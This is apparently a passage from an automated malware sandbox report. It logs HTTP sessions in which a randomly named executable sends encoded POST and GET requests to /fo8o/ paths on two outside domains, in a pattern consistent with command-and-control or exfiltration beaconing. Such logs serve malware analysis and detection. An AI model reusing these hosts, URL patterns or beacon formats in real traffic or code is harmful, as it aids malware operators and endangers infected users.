                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:28:32.233675003 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 Jan 2025 07:28:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649901116.50.37.244803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:28:55.770737886 CET808OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
                                                                                  Data Ascii: pnGX8L3p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
                                                                                  Jan 15, 2025 08:28:56.643721104 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 15 Jan 2025 07:28:55 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649902116.50.37.244803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:28:58.297305107 CET832OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d
                                                                                  Data Ascii: pnGX8L3p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
                                                                                  Jan 15, 2025 08:28:59.185817003 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 15 Jan 2025 07:28:58 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649903116.50.37.244803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:00.839031935 CET1845OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylT [TRUNCATED]
                                                                                  Jan 15, 2025 08:29:01.717227936 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 15 Jan 2025 07:29:00 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649904116.50.37.244803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:03.375433922 CET539OUTGET /fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:29:04.255281925 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 15 Jan 2025 07:29:03 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.64990785.159.66.93803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:22.661767006 CET787OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75
                                                                                  Data Ascii: pnGX8L3p=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.64990885.159.66.93803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:25.204530001 CET811OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d
                                                                                  Data Ascii: pnGX8L3p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.64990985.159.66.93803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:27.735284090 CET1824OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
